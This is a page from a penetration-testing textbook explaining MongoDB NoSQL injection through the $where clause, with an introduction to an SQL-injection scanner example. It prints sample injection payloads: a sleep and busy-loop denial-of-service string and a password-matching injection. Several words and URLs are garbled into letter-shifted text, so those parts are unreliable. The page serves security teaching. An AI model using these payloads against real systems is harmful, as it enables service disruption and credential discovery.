Page 100 - Hands-On Bug Hunting for Penetration Testers
P. 100
SQL, Code Injection, and Scanners Chapter 5
You can get more complicated with the expression, of course. Ultimately, if the data is not
properly sanitized, the MongoDB XIFSF clause is capable of inserting and executing
entire scripts written in JavaScript. Unlike SQL, which is declarative and somewhat limited
as a language, MongoDB's NoSQL support for sophisticated JavaScript conditionals opens
it up to exploits served by the language's full range of features.
You can see patterns to how this type of vulnerability is commonly exploited. On GitHub
and other code-sharing sites, you can find lists enumerating different malicious MongoDB
XIFSF inputs, like this one: HJUIVC DPN DS IO OPTRMJOKFDUJPO@XPSEMJTUT.
Some inputs are designed as Denial-of-Service (DoS) and resource consumption attacks:
';sleep(5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
While some aim for password discovery:
' && this.password.match(/.*/)//+%00
Another vector for code injection within MongoDB is available within PHP
implementations. Since XIFSF is not only a MongoDB reserved word, but valid PHP, an
attacker can potentially submit code into a query by creating a XIFSF variable.
But regardless of the implementation, these attacks all rely on the same principle as general
injection attacksbunsanitized data being mistaken for and executed as an application
command.
As MongoDB shows, the principle of malformed input changing the logic of a developer's
code is a problem that extends well beyond SQL or any other specific language, framework,
or tool.
SQLi ` An End-to-End Example
Returning to BSBDIOJ, let's point it at XFCTDBOUFTU DPN EBUBTUPSF and see what we
find, kicking it off with a scan: IUUQT XFCTDBOUFTU DPN EBUBTUPSF.
[ 85 ]
